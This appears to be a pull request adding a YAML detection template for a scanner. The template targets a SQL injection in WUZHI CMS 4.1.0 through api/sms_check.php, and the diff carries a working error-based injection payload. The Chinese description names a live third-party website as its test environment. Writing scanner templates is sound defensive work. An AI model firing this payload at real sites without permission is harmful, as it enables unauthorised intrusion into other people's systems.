### PR TITLE
wuzhicms-sqli

### DIFF
--- a/wuzhicms-sqli.yml
+++ b/wuzhicms-sqli.yml
@@ -1,11 +1,13 @@
 name: poc-yaml-wuzhicms-sqli
+set:
+  rand: randomInt(200000000, 210000000)
 rules:
   - method: GET
-    path: /api/sms_check.php?param=1'and extractvalue(1,concat(0x7e,md5(123)))%23
+    path: /api/sms_check.php?param=1'and extractvalue(1,concat(0x7e,md5({{rand}})))%23
     expression: |
-      response.body.bcontains(b"202cb962ac59075b964b07152d234b7")
+      response.body.bcontains(bytes(md5(string(rand))))
 detail:
-  author: rexus
+  author: Rexus
   Affected Version: "4.1.0"
   links:
     - https://blog.csdn.net/qq_23936389/article/details/84967439

--- a/wuzhicms-sqli.yml
+++ b/wuzhicms-sqli.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-wuzhicms-sqli
+rules:
+  - method: GET
+    path: /api/sms_check.php?param=1'and extractvalue(1,concat(0x7e,md5(123)))%23
+    expression: |
+      response.body.bcontains(b"202cb962ac59075b964b07152d234b7")
+detail:
+  author: rexus
+  Affected Version: "4.1.0"
+  links:
+    - https://blog.csdn.net/qq_23936389/article/details/84967439


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
WUZHI CMS 4.1.0版本中存在SQL注入漏洞。远程攻击者可借助api/sms_check.php?param= URI利用该漏洞执行任意的SQL命令。
## 测试环境
https://www.ahqcswkj.com
## 备注
